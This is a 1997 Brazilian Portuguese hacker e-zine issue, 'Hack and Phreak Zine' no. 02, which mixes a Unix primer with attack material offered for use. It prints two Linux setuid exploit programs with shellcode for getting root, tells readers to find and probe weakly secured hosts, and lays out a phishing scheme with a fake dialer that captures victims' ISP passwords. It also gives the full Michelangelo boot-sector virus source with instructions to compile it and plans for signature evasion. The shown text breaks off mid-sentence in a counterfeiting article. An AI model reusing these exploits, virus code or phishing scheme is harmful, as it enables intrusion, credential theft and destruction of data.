°°°°--------------------------------------------------------------------°°°°
 ±±±±                                                                    ±±±±
 ²²²²                                                                    ²²²²
 ÛÛÛÛ                  H A C K       A N D     P H R E A K               ÛÛÛÛ
 ²²²²                                                                    ²²²²
 ±±±±                                ZINE                                ±±±±
 °°°°--------------------------------------------------------------------°°°°
     
                        Numero: 02 - Dezembro de 1997
          Home Page: http://www.geocities.com/SiliconValley/Peaks/1292
                           E-Mail: mandrack@usa.net

         Para melhor visualiza‡ao use o EDIT do DOS ou algo parecido
        



|||---|||---|||---|||---|||---|||---|||---|||---|||---|||---|||---|||---|||---|||---



   - O hacker que participa de clubes e fanzines so' sabe copiar os outros

                                                           * Darth Invader

                         - Feliz NAtAL    OhOhOh

                                                           * Papai Noel


|||---|||---|||---|||---|||---|||---|||---|||---|||---|||---|||---|||---|||---|||---





                                  I N D I C E
                             _-^-_-^-_-^-_-^-_-^-_
                                  

        I - INTRODU€AO
       II - WANTED: EDITORS
      III - INTRODU€AO AO HACKING
               3.1 - Bugs e Exploits
       IV - ViRii - by Cebola
        V - ANARQUIA!!!
       VI - SEGURAN€A: WINDOWS 95
      VII - WAREZ
     VIII - PHREAKING: INTRODU€AO A ELETRICIDADE
       IX - CORREIO DA GALERA
        X - ANUNCIOS E PUBLICA€OES
       XI - CONTATANDO OS AUTORES
      XII - BRINDE: EXPLOIT PARA MICROS PENTIUM

°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±


                               I - INTRODU€AO
                               **************   

   yO dUdes, eu MaNdRaCk, estou abrindo aki a ultima edi‡ao do zine!!!, deste
ano eh claro, pois o zine vai continuar com todo pique, a todo vapor, com to-
dos os obstaculos, enfrentando todas as dificuldades, aceitando qualquer para-
da...
   Bah, chega de enrolaceira, vamos ao q interessa. A cada dia q passa eu re-
cebo cada vez mais mails, isso significa q o zine estah indo pra frente. E
agora? Vai ficar nisso? Nao, nao para por ai. O Zine Hack and Phreak estah
com um canal de mIRC no ar, funcionando 24 hs por dia, 7 dias por semana...
   Podem ir lah. Eh o servidor irc.magiclink.com.br, canal #hackphr. Gra‡as
ao Cebola um BOT estah funcionando lah, q tem cada vez mais gente participando
Vcs todos podem me encontrar lah, pra ser mais exato, com certeza, quase toda
Sexta-Feira a noite, depois das 9:00. Mas eh bom verificar, sempre vai ter
gente lah. Nosso intuito com esse canal eh entre eles: Promover eventos vir-
tuais pra toda comunidade Computer Underground Nacional. Queremos ampliar o
grupo, pois ate agora somos apenas 2, eu e o Cebola. Podem continuar se candi-
datando, nao apenas a editor, e sim a membro do grupo.
   Aih vc pergunta: Mas nao escrevo bem, e nao entendo muito disso..., aih eu
digo: Nao tem problema algum, vc nao precisa escrever para o zine, pois agora
q quero aumentar o grupo, surgirao varias fun‡oes novas. Quero deixar bem
claro q nao estou inaugurando um clube, estou apenas formando um grupo de
Hackers, Phreakers, Anarquistas, ViRii Mans, e tudo mais.
   Voltando a falar do zine, vou tentar fazer o maximo para ser mensal, mas
como ninguem eh de ferro, eu tmb tiro ferias. Em consequencia disto, a edi‡ao
03 soh em Fevereiro, OK?
   Sobre a minha Home Page, muitos dizem q gostaram, outros reclamam q o link
pra edi‡ao 00 nao estah funcionando. Depois de verificar, constatei q estah
funcionando muito bem, a nao ser q vc esteja usando o Explorer, aih meus pe-
sames, q nao testei ainda com a caca do explorer, mas mesmo assim, vou dar
a minha assistencia aos fracos e oprimidos usuarios do IE. Fa‡a o seguinte,
tente pelo endere‡o:

   http://www.geocities.com/SiliconValley/Peaks/1292/Hacphr00.zip

   Este eh o caminho pro arquivo Hacphr00.zip, q eh o q dizem q nao estah
dando pra baixar. Se nao der certo assim, eh q o problema nao eh meu nem
do GeoCities, eh seu.
   Bom, agora voltando a falar sobre o zine. Neste zine, irei come‡ar a falar
sobre o Hacking na Internet em geral, e na area Phreak, (onde sou mais especi-
alizado) come‡arei com no‡oes basicas de eletronica, q eh fundamental para
alguem q queira ser Phreaker. Como vcs poderao notar, a parte sobre Anarquia
estah menor do q de costume, eh q o otario do AmStErDaN nao escreve mais pra
mim, entao tive q me virar sozinho, ele nem fez metade do q estah aki nesta
edi‡ao. Anarquia soh continua se tiver alguem pra escrever, senao: Hasta la
Vista Baby...
   Como o interesse eh grande, tentarei achar alguem pra escrever sobre IRC
War, apesar de eu nao me interessar muito, o interesse eh de vcs.
   Bom chega de papo e vamos ao q interessa, espero q gostem desta edi‡ao,
que seja o meu presente de Natal pra vcs...  ;)


December, 1997 - MaNdR’Ck - Hack and Phreak Zine

°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±



                            II - WANTED: EDITORS
                            ********************

   Vcz sempre podem mandar mails se candidatando, mas por favor, nao mandem
mails do tipo:

----------
   Oi, queria ser editor do seu zine, mas como nao sei nada vc vai ter que
me ensinar primeiro, OK?

   Lord Lamer
----------
   Bah, se candidate soh se souber alguma coisa relacionada a Hacking em ge-
ral, Phreaking, Warez, Anarchy, e qualquer outro assunto Underground.
   Quando mandar aguarde resposta, se nao for respondido, eh que vc nao vai
ser Editor, monte seu proprio zine. Se demorar um pouco nao estranhe, pois
todo mundo tem problemas com e-mail. ;)


PRA QUEM AINDA NAO SABE:

   EDITORES DO EZINE HACK AND PHREAK:

   MaNdR’Ck             Cebol@

   mandrack@usa.net     cebola_br@hotmail.com


December, 1997 - MaNdR’Ck - Hack and Phreak Zine

°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±



                             INTRODU€AO AO HACKING
                             *********************

   Bom, antes de mais nada, eh claro vc precisa se especializar num SO (Sis-
tema Operacional). Escolha um, de preferencia Linux, NT 4.0, Redes Novell,
ou qualquer outro que vc encontra com frequencia. Para hackear na Internet,
especialize-se no UNIX, pegue o Linux no endere‡o: www.sunsite.unc.edu, e
instale-o. (Eu poderia fazer um tutorial detalhado sobre a instala‡ao, mas
como jah foi publicado em outro e-zine, nao vou colocar.) Todo o tipo de co-
nhecimento tbm eh bem-vindo. Vc pode ler bons textos sobre o UNIX (Linux),
ou acompanhar alguma coisa neste e-zine, de vez em quando vou falar sobre
ele. Mas tem coisas que vc deve saber de cara, que sao alguns comandos basi-
cos, aqueles que vc sabe no MS-DOS, tais como DIR, COPY, DEL, etc...
   Para vc treinar, use o seu Linux, ou entao, tente usar um shell de seu
proprio provedor, se vc nao fazer nada, eles nem ligam, se vc nao tiver, pe-
‡a a eles, os mais pau-no-cu vao lhe cobrar uma mensalidade, mas se vc os
conhece, eh soh pedir que eles deixam, diga que eh pra vc aprender a mexer
com UNIX...
   Aqui estao alguns comandos basicos que vc usava no MS-DOZ:

DIR    =  ls -l
DIR/W  =  ls
DIR/AH =  ls -a
RENAME =  mv
MD     =  mkdir
RD     =  rmdir
COPY   =  cp
DEL    =  rm  
ATTRIB =  chmod (veja permissoes de arquivos na edi‡ao passada)
CD     =  cd

   Em UNIX, quando vc se refere a diretorios, vc utiliza a barra normal, "/"
nao a contra-barra no MS-DOS "\". Por exemplo, no MS-DOS, se vc estiver em
qualquer diretorio, e quiser ir para o raiz, vc dava o comando "CD\". No
Unix vc utiliza a barra normal: "cd/". O mesmo acontece com diretorios. Mas 
preste aten‡ao, no UNIX os diretorios pode ter varias letras tanto quanto
no nome de arquivo, quanto na extensao, no MS-DOS isto era limitado por 8
caracteres no nome de arquivo e tres na extensao do arquivo. E vc deve con-
siderar as letras maiusculas e minusculas, no MS-DOS nao importava se vc
digitasse DIR, ou dir, tanto faz, no UNIX nao, vc deve digitar ls em minuscu-
lo, senao nao vai funcionar, pois o arquivo ls esta minusculo. Vamos para um
exemplo:

SE€AO MS-DOS (MicroSoft Disk Operational System) by Bill Gates - OHOHOHO

==| BEGIN |===================================================================

DOSKey instalado

MODE preparar - funcao de pagina de codigo concluida

MODE selecionar - funcao de pagina de codigo concluida

C:\>dir

O volume da unidade C e HACPHR
O numero de serie do volume e 5F08-45E3
Diretorio de C:\

.                     20/09/97  14:39
..                    20/09/97  14:39
DOS                   21/09/97  21:06
GAMES                 21/09/97  22:18
HACPHR                22/09/97   9:42
UTIL                  22/09/97  10:01
WINDOWS               23/09/97  13:15
WINWORD               23/09/97  14:03
AUTOEXEC BAT          497  20/09/97  14:40
CONFIG   SYS          199  20/09/97  14:40
COMMAND  COM       95.924  20/09/97  14:40
         3 arquivo(s)           791.924  bytes
         6 diretorio(s)   1.113.632.786  bytes livres

C:\>cd hacphr

C:\HACPHR>dir/w

O volume da unidade C e HACPHR
O numero de serie do volume e 5F08-45E3
Diretorio de C:\HACPHR

[.]            [..]             HACPHR00.TXT   HACPHR01.TXT   HACPHR02.TXT  

         3 arquivo(s)           261.101  bytes 
         2 diretorio(s)   1.113.632.786  bytes livres

C:\HACPHR>del hacphr00.txt

==| END |=====================================================================

   Agora veja a mesma coisa, soh que em UNIX...

==| BEGIN |===================================================================

Welcome to NASA
Please Log In

login: mandrack
password:

UNIX SYSTEM V REL 3.2

(c) 1984 AT&T


$ ls -l

drwx--x--x  mandrack  root  342  Nov 01  images
-rwx--x--x  mandrack  root 1256  Nov 01  ovnis.report

$ cd images

$ ls

ovni01.jpg        mars.jpg       ufo.jpg        earth.jpg      

$ rm ufo.jpg

==| END |=====================================================================

   Vc pode notar que no UNIX sempre eh exigido nome e senha, nao eh soh che-
gar qualquer otario e mexer em tudo q der na telha. Observe tbm que este shell
nao fica mostrando o diretorio atual, para ver eh soh digitar o comando "pwd".
   Outra observa‡ao, eh quando vc quiser voltar UM diretorio, vc digita cd ..
com espa‡o entre os dois pontos. Parece pior a primeira vista, mas com o tem-
po e a pratica, vc vai ver que eh bem melhor q o MS-DOS, principalmente depois
quando eu come‡ar a falar sobre os processos. Ai vc vai ver a superioridade
do UNIX sobre o MS-DOS do Bill Demon 666.
   Bom, agora eu jah tenho o Linux, brinquei um pouco com meu shell do meu
provedor, ja consegui, depois de muito estudo decorar estes comandos, e agora?
   Acabou, sou um HACKER? Ahahaha. :)
   Bom, ao menos vc jah tem um passo andado. Agora vc pode come‡ar a mexer com
Telenet, ou simplesmente Telnet.
   Existem varios programas para Telnet, inclusive, se vc usa o Windowz, vc
tem um. Eh o telnet.exe. Para facilitar vc pode apenas clicar em executar, no
menu iniciar e digitar:

telnet host.com.br

   Mas antes vc precisa saber o nome, ou o endere‡o IP de um host. Vamos a um
exemplo:

telnet host.com

Connected to host.com.br

Linux 2.0.28 (host.com.br) (ttyp0)

login: mandrack
password: ******

$

Pronto, vc chegou ao prompt, mas primeiro vc teria que digitar o nome e a se-
nha, senao nada feito.
   O Telnet usa os mesmos comandos do UNIX normal, ai vc tbm pode treinar suas
habilidades com o UNIX.

   OBS.: Quando eu coloco host.com.br, quer dizer que vc tem que por o nome
de um host, ex.: microsoft.com, cade.com.br, etc...


   Utilizando FTP
   ==============

   Existe um programa chamado FTP.EXE do diretorio \WINDOWS. Rode-o da seguin-
te maneira:

C:\WINDOWS>ftp ftp.dominio.com

Ira surgir um prompt:

ftp>

Para ter uma lista dos comandos, digite "?".

ftp> ?
Commands may be abbreviated.  Commands are:

!               delete          literal         prompt          send
?               debug           ls              put             status
append          dir             mdelete         pwd             trace
ascii           disconnect      mdir            quit            type
bell            get             mget            quote           user
binary          glob            mkdir           recv            verbose
bye             hash            mls             remotehelp
cd              help            mput            rename
close           lcd             open            rmdir

   Observe que sao quase todos os mesmos comandos do UNIX. Na hora da dar o
login, utilize uma conta, mas se vc nao sabe a senha, fa‡a o seguinte:

login: anonymous
password:

   Entre a password com um e-mail qualquer ex.: capitain@usaf.mil.gov, e vc
estah lah dentro...  ;)
   Simples nao?

   Bom agora que vc jah sabe como logar em sistemas, e executar alguns coman-
dos basicos, vamos ver o que fazer:
   Primeiro procure o host de uma maquina, digamos, "exploitavel", uma maqui-
na cheia de bugz. Principalmente de um provedor novinho. Entao use aquele host
como seu alvo. Obtenha o maximo de informa‡oes possiveis sobre ele.
   Entao vc pode come‡ar a xeretar nele, pegue alguns arquivos, vasculhe os
diretorios, mas nao fa‡a nenhuma bobeira, senao vc se ferra, nao esque‡a que
sua visita esta sendo registrada num arquivo de log, e junto seu endere‡o IP,
apenas aprenda, nao apague nada, nao escreva nada, nao modifique nada.
   Depois de vc ter vasculhado tudo, ter visto a versao do SO, veja se nele
existem bugs que possam serem exploitados. Existem muitos bugs em varios pro-
gramas, falarei sobre eles agora.


      3.1 - BUGS E EXPLOITS
      =====================

   O que sao bugs? Se traduzirmos do ingles: BUG: inseto, percevejo, micro-
bio, (giria): "defeito". Eh isso mesmo, DEFEITO. E eles existem muito, OH, e
como. A maioria dos programas, principalmente SO possuem um. As vezes o pro-
prio hardware, tais como algumas marcas de processadores pentium possuem.
   E os exploits? Sao programas que sao feitos para tirar proveito do bug.
Vamos a um pequeno exemplo de um exploit que funciona em maquinas com Linux:
   Bom, antes de compilar a fonte vc deve verificar se existe o arquivo mount
ou unmout em algum diretorio. Este arquivo encontra-se geralmente no direto-
rio /bin. Mas se nao tiver lah use o comando find para encontra-lo.
   Depois de achar o dito cujo va ate o diretorio onde ele estah. Veja a per-
missao digitando ls -al unmount

$ ls -al unmount

-rwsr-sr-x   1 root         8888 Mar 21  1995 umount

BELEZA!!! As permissoes do owner estao em rws. O exploit funciona. Agora para
pegar a senha do root eh so compilar e executar a fonte abaixo:

/====| BEGIN  |====================================================
/* sno.c : Linux realpath exploit
 * Syntax: ./sno N
 *         mount $WOOT 
 *    OR  umount $WOOT
 * N is some number which seems to differ between 4 & 8, if your number is
 * too big, you will get a mount error, if it is too small, it will seg
 * fault.  Figure it out.  (Sometimes N=0 for mount)
 * If you use mount, first thing to do once you get the root shell is rm 
 * /etc/mtab~, if this file exists you can't root with mount until it is 
 * removed.
 * 
 *
 *                                          -ReDragon
 */
#define SIZE 1024

   long get_esp(void)
   {
   __asm__("movl %esp,%eax\n");
   }

   main(int argc, char **argv)
   {
   char env[SIZE+4+1]; /* 1024 buffer + 4 byte return address + null byte */
   int a,r;
   char *ptr;
   long *addr_ptr;
   char execshell[] =
   "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
   "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
   "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
   char *exec_ptr = execshell;

   r=atoi(argv[1]);  
   ptr = env;
   memcpy(ptr,"WOOT=",5); /* set environment variable to use */
   ptr += 5;              

   for(a=0;a |======================================================

   Compile e execute. Se nao funcionar tente o lpr. O arquivo geralmente se 
encontra no diretorio /usr/bin. Se ele estiver lah verifique a permissao.
   Se estiver OK, use o script abaixo:


/====| BEGIN  |========================================================

#include 
#include 
#include 

#define DEFAULT_OFFSET          50
#define BUFFER_SIZE             1023

long get_esp(void)
{
   __asm__("movl %esp,%eax\n");
}

void main()
{
   char *buff = NULL;
   unsigned long *addr_ptr = NULL;
   char *ptr = NULL;

   u_char execshell[] = "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07"
                        "\x89\x56\x0f\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12"
                        "\x8d\x4e\x0b\x8b\xd1\xcd\x80\x33\xc0\x40\xcd\x80\xe8"
                        "\xd7\xff\xff\xff/bin/sh";
   int i;

   buff = malloc(4096);
   if(!buff)
   {
      printf("can't allocate memory\n");
      exit(0);
   }
   ptr = buff;
   memset(ptr, 0x90, BUFFER_SIZE-strlen(execshell));
   ptr += BUFFER_SIZE-strlen(execshell);
   for(i=0;i < strlen(execshell);i++)
      *(ptr++) = execshell[i];
   addr_ptr = (long *)ptr;
   for(i=0;i<2;i++)
      *(addr_ptr++) = get_esp() + DEFAULT_OFFSET;
   ptr = (char *)addr_ptr;
   *ptr = 0;
   execl("/usr/bin/lpr", "lpr", "-C", buff, NULL);
}

/====| END  |==========================================================

   Ok, jah que vc tem uma base do que eh um exploit, podemos deixar isso por
aqui. Jah eh outro passo a mais. Vou tentar sempre colocar no minimo um ex-
ploit por edi‡ao do zine.

Valeu.  ;)


December, 1997 - MaNdR’Ck - Hack and Phreak Zine

°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±



                           IV - ViRii - by Cebola
                           **********************


  ****************************** ATENCAO **********************************
  OS ARTIGOS AQUI PUBLICADOS TEM O INTUITO DE ENSINAR E MANTER INFORMADO O
  LEITOR DO E-ZINE. QUALQUER USO INDEVIDO DO MATERIAL AQUI CONTIDO  DE IN-
  TEIRA RESPONSABILIDADE DE QUEM O USA... O EDITOR NAO TEM NADA A VER COM
  ISSO.
  **************************************************************************



Introdu‡ao:
-----------

         A¡, galera... mes de dezembro, vem o numero 2 do zine, minha segunda
contribui‡ao aqui, a popularidade do zine aumentando.... o n¡vel crescendo...
nao poderia estar melhor. Na minha primeira participa‡ao aqui, eu falei sobre
as diferen‡as sobre Cavalos de Tr¢ia, Virus, Variantes e ensinei a construir
um cavalo de tr¢ia(bem simples) usando Pascal. Prometi dar uma continua‡ao
sobre o que eu chamei de segundo tipo de cavalo de tr¢ia, ou seja, o c¢digo
que se disfar‡a em um programa supostamente original e captura senhas e outras
entradas do usu rio. Depois de descobrir senhas, o programa as envia para seu
criador. Vou come‡ar tamb‚m um tutorial seguro de como escrever variantes de
virus, dando tamb‚m sources de virus famosos para modifica‡Æo. Por essa edi‡Æo
‚ s¢, pois o source do Michelangelo ‚ grande demais. No final da mat‚ria, um
preview do que vem na pr¢xima edi‡Æo.

Cavalos de Tr¢ia: segunda defini‡ao:
------------------------------------

        Como para quase todo o tipo de hacking pela Internet necessita-se
de um ot rio pra voce "chupar" os cr‚ditos Internet dele, ‚ isso que eu vou
ensinar aqui. Pra quem ainda nao entendeu, quando vocˆ pretender fazer algo
"na mocada" pela internet, acesse a grande rede pela conta Internet de outra
pessoa, assim, se algu‚m for te rastrear, vai rastrear o ot rio dono da conta
que vocˆ est  "chupando".
         exatamente isso que o segundo tipo de cavalo de tr¢ia faz: descobre
senhas, mais especificadamente em nosso caso, senha e contas Internet de
ot rios. A primeira coisa a se fazer ‚ trabalhar sob ambiente windows, eviden-
temente, pois a grande maioria de Internet trabalha sob ambiente win95, entao
o c¢digo que estarei dando aqui se aplica para linguagens de programacao de
ambiente win95 de £ltima gera‡ao, como o Borland Delphi 3.0 ou o Visual Basic
5.0 (o fato deu estar citando o win95 e o VB aqui nao tem nada a ver como uma
especial adoracao minha … Microsoft. O que acontece ‚ exatamente o contr rio.
Por‚m, algumas ferramentas nao sao aplic veis ao Delphi 3.0). Nao usarei Java
aqui porque a linguagem da Sun oferece um alto n¡vel de prote‡ao contra certas
opera‡oes, o que dificulta o nosso trabalho. O Delphi e o VB usam ActiveX, que
nao oferece tanta protecao.
        Outro ponto a ser considerado, ‚ que ‚ relativamente f cil "roubar" o
arquivo que cont‚m as senhas internet. Por‚m, esse arquivo ‚ criptografado uti
lizando algor¡timos de £ltima gera‡Æo e ‚ muito dif¡cil(quase imposs¡vel) des
criptografar tais arquivos. Portanto, se vocˆ nÆo quer ficar tentando v rios
dias(em alguens casos at‚ meses) acertar a senha de algu‚m no seu provedor,
use a cabe‡a, pois h  m‚todos com at‚ 70% de efic cia que funcionam muito bem
e te permitem, com muito mais facilidade, descobrir a senha de algu‚m. Um m‚-
todo que eu j  utilizei e, apesar de parecer bobagem, funcionou bem v rias ve-
zes, ‚ o m‚todo da promo‡Æo: vocˆ acha um ot rio qualquer do seu provedor(se a
pessoa tiver poucos conhecimentos em inform tica fica muito mais f cil), e
manda uma mensagem para ela, como a seguinte:
       
        Parab‚ns!!!

        O seu e-mail foi sorteado na promo‡Æo da IDK, um novo provedor inter-
net da sua cidade. Vocˆ ganhou seis meses de acesso gratuito … Internet, al‚m
de um espa‡o de at‚ 2 MEGA para a divulga‡Æo de sua Homepage. Anexo a essa
mensagem, vem um programa para se cadastrar automaticamente.

        Agradecimentos,

       IDK provedor.

       A pessoa vai querer checar o arquivo, a quando abrir o programa, vai
ter uma tela dizendo, por exemplo: o programa ir  agora checar a sua conexÆo
… Internet para fazer o cadastro. Quando vocˆ clica em OK, uma tela imitando
um discador ou a Rede Dial Up do WIN95 aparece, dizendo: "Vocˆ foi
desconectado do n£mero que discou. Para re-conectar automaticamente, preencha
o campo abaixo e clique em OK. VÆo ter alguns campos, como: username, senha e
numero do telefone do provedor. O idiota vai preencher e clicar em OK. Nesse
momento, o programa vai entrar em contato comigo e fornecer esses dados.
Depois, ‚ relaxar e aproveitar!!
        Se algu‚m encontrar dificuldades em fazer tal programa(um bom progra-
mador em Visual Basic 5.0 ou Delphi 3.0 nao encontrara dificuldade) entre em
contato comigo por e-mail(cebola_br@hotmail.com) e eu terei prazer em ajudar
se vocˆ nao for um lammer.

         
Variantes:
----------

        Para comecar o meu tutorial sobre como escrever variantes de virus,
vou dar o source do Michelangelo e ensinar como pode se fazer tal variante, de
modo que seja o mesmo virus, com as mesmas a‡oes(mas se vocˆ quiser mudar al-
guma coisa pode), contanto, que nÆo seja identificado por anti-virus que tra-
balham com banco de dados de assinatura de virus, como o ViruScan da McAfee e
o TBAV. Bom, o source t  a¡. Na pr¢xima edi‡Æo eu ensino a fazer uma variante.
Para compilar s¢ copie o c¢digo para um editor sem formata‡ao como o edit do
DOS e salve como ASM. Use o assembler A86 e compile. Ser  obtido um arquivo
.com pronto para ser executado e infectar!
**************** INICIO DO CàDIGO. VIRUS: MICHELANGELO **********************

michelangelo    segment byte public
                assume  cs:michelangelo, ds:michelangelo
                org     0

                jmp     entervirus
highmemjmp      db      0F5h, 00h, 80h, 9Fh
maxhead         db      2                       ; used by damagestuff
firstsector     dw      3
oldint13h       dd      0C8000256h

int13h:
                push    ds
                push    ax
                or      dl, dl                  ; default drive?
                jnz     exitint13h              ; exit if not
                xor     ax, ax
                mov     ds, ax
                test    byte ptr ds:[43fh], 1   ; disk 0 on?
                jnz     exitint13h              ; if not spinning, exit
                pop     ax
                pop     ds
                pushf
                call    dword ptr cs:[oldint13h]; first call old int 13h
                pushf
                call    infectdisk              ; then infect
                popf
                retf    2
exitint13h:     pop     ax
                pop     ds
                jmp     dword ptr cs:[oldint13h]

infectdisk:
                push    ax
                push    bx
                push    cx
                push    dx
                push    ds
                push    es
                push    si
                push    di
                push    cs
                pop     ds
                push    cs
                pop     es
                mov     si, 4
readbootblock:
                mov     ax,201h                 ; Read boot block to
                mov     bx,200h                 ; after virus
                mov     cx,1
                xor     dx,dx
                pushf
                call    oldint13h
                jnc     checkinfect             ; continue if no error
                xor     ax,ax
                pushf
                call    oldint13h               ; Reset disk
                dec     si                      ; loop back
                jnz     readbootblock
                jmp     short quitinfect        ; exit if too many failures
checkinfect:
                xor     si,si
                cld
                lodsw
                cmp     ax,[bx]                 ; check if already infected
                jne     infectitnow
                lodsw
                cmp     ax,[bx+2]               ; check again
                je      quitinfect
infectitnow:
                mov     ax,301h                 ; Write old boot block
                mov     dh,1                    ; to head 1
                mov     cl,3                    ; sector 3
                cmp     byte ptr [bx+15h],0FDh  ; 360k disk?
                je      is360Kdisk
                mov     cl,0Eh
is360Kdisk:
                mov     firstsector,cx
                pushf
                call    oldint13h
                jc      quitinfect              ; exit on error
                mov     si,200h+offset partitioninfo
                mov     di,offset partitioninfo
                mov     cx,21h                  ; Copy partition table
                cld
                rep     movsw
                mov     ax,301h                 ; Write virus to sector 1
                xor     bx,bx
                mov     cx,1
                xor     dx,dx
                pushf
                call    oldint13h
quitinfect:
                pop     di
                pop     si
                pop     es
                pop     ds
                pop     dx
                pop     cx
                pop     bx
                pop     ax
entervirus:
                xor     ax,ax
                mov     ds,ax
                cli
                mov     ss,ax
                mov     ax,7C00h                ; Set stack to just below
                mov     sp,ax                   ; virus load point
                sti
                push    ds                      ; save 0:7C00h on stack for
                push    ax                      ; later retf
                mov     ax,ds:[13h*4]
                mov     word ptr ds:[7C00h+offset oldint13h],ax
                mov     ax,ds:[13h*4+2]
                mov     word ptr ds:[7C00h+offset oldint13h+2],ax
                mov     ax,ds:[413h]            ; memory size in K
                dec     ax                      ; 1024 K
                dec     ax
                mov     ds:[413h],ax            ; move new value in
                mov     cl,6
                shl     ax,cl                   ; ax = paragraphs of memory
                mov     es,ax                   ; next line sets seg of jmp
                mov     word ptr ds:[7C00h+2+offset highmemjmp],ax
                mov     ax,offset int13h
                mov     ds:[13h*4],ax
                mov     ds:[13h*4+2],es
                mov     cx,offset partitioninfo
                mov     si,7C00h
                xor     di,di
                cld
                rep     movsb                   ; copy to high memory
                                                ; and transfer control there
                jmp     dword ptr cs:[7C00h+offset highmemjmp]
; destination of highmem jmp
                xor     ax,ax
                mov     es,ax
                int     13h                     ; reset disk
                push    cs
                pop     ds
                mov     ax,201h
                mov     bx,7C00h
                mov     cx,firstsector
                cmp     cx,7                    ; hard disk infection?
                jne     floppyboot              ; if not, do floppies
                mov     dx,80h                  ; Read old partition table of
                int     13h                     ; first hard disk to 0:7C00h
                jmp     short exitvirus
floppyboot:
                mov     cx,firstsector          ; read old boot block
                mov     dx,100h                 ; to 0:7C00h
                int     13h
                jc      exitvirus
                push    cs
                pop     es
                mov     ax,201h                 ; read boot block
                mov     bx,200h                 ; of first hard disk
                mov     cx,1
                mov     dx,80h
                int     13h
                jc      exitvirus
                xor     si,si
                cld
                lodsw
                cmp     ax,[bx]                 ; is it infected?
                jne     infectharddisk          ; if not, infect HD
                lodsw                           ; check infection
                cmp     ax,[bx+2]
                jne     infectharddisk
exitvirus:
                xor     cx,cx                   ; Real time clock get date
                mov     ah,4                    ; dx = mon/day
                int     1Ah
                cmp     dx,306h                 ; March 6th
                je      damagestuff
                retf                            ; return control to original
                                                ; boot block @ 0:7C00h
damagestuff:
                xor     dx,dx
                mov     cx,1
smashanothersector:
                mov     ax,309h
                mov     si,firstsector
                cmp     si,3
                je      smashit
                mov     al,0Eh
                cmp     si,0Eh
                je      smashit
                mov     dl,80h                  ; first hard disk
                mov     maxhead,4
                mov     al,11h
smashit:
                mov     bx,5000h                ; random memory area
                mov     es,bx                   ; at 5000h:5000h
                int     13h                     ; Write al sectors to drive dl
                jnc     skiponerror             ; skip on error
                xor     ah,ah                   ; Reset disk drive dl
                int     13h
skiponerror:
                inc     dh                      ; next head
                cmp     dh,maxhead              ; 2 if floppy, 4 if HD
                jb      smashanothersector
                xor     dh,dh                   ; go to next head/cylinder
                inc     ch
                jmp     short smashanothersector
infectharddisk:
                mov     cx,7                    ; Write partition table to
                mov     firstsector,cx          ; sector 7
                mov     ax,301h
                mov     dx,80h
                int     13h
                jc      exitvirus
                mov     si,200h+offset partitioninfo ; Copy partition
                mov     di,offset partitioninfo      ; table information
                mov     cx,21h
                rep     movsw
                mov     ax,301h                 ; Write to sector 8
                xor     bx,bx                   ; Copy virus to sector 1
                inc     cl
                int     13h
;*              jmp     short 01E0h
                db      0EBh, 32h               ; ?This should crash?
; The following bytes are meaningless.
garbage         db      1,4,11h,0,80h,0,5,5,32h,1,0,0,0,0,0,53h
partitioninfo:  db      42h dup (0)
michelangelo    ends
                end


***************************** FINAL DO CàDIGO *******************************

        Na pr¢xima edi‡Æo:

        * Fonte em Pascal para infec‡Æo de arquivos.
        * Continua‡Æo do tutorial de como escrever variantes de virus.
        * Algor¡timo usado na cria‡Æo de programas geradores de n£meros
          de cartÆo de cr‚dito.


December, 1997 - Cebol@ - Hack and Phreak Zine

°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±°±²Û²±



                             V - ANARQUIA!!!
                             ****************

   O uso indevido destas informa‡oes eh crime e dah varios anos de cadeia e
uma multa da pesada, portanto, use estas informa‡oes como mais um conhecimen-
to e nao tente executar nenhum dos projetos aqui citados, apenas em caso de
emergencia extrema. A utiliza‡ao inadequada de explosivos e produtos quimicos
pode causar danos fisicos a vc e outras pessoas.
   Acho q essa vai ser uma das ultimas contribui‡oes do AmStErDaN pro e-zine,
mas tudo bem. Depois de eu revisar este texto e corrigir os inescrulposos
erros de ortografia de meu amigo AmStErDaN, ai vai mais um...

                                                         warning by MaNdR’Ck



   Alo galera. Acho que nao vai dar pra continuar a escrever pro e-zine, tah
muito dificil a situa‡ao, mas se der eu contribuo as vezes com uns textos, de
vez em quando. Bom chega de papo-furado e vamos ao que interessa...

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

   Bom, como o AmStErDaN sujou com o zine, eu peguei um trecho do texto em
q ele retirava a maioria das coisas q ele escrevia pro zine, o texto tah em
ingles, eh q eu nao tive tempo pra traduzir, aki tinha algumas coisas q ele
disse q colocaria nesta edi‡ao, entre elas, fazer explosivos plasticos.
   Alem disso tem um trecho de como abrir cofres e fechaduras. Desculpem
pelo incidente, foi a segunda e ultima vez q isso acontece, pois o AmStErDaN
jah era...

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

Counterfeiting Money                            by The BHU
 
Before reading this article  it would be a very good idea to get a
book on photo offset printing  for this is the method used in
counterfeiting US currency.  If you are familiar with this method
of printing  counterfeiting should be a simple task for you.
 
Genuine currency is made by a process called "gravure"  which
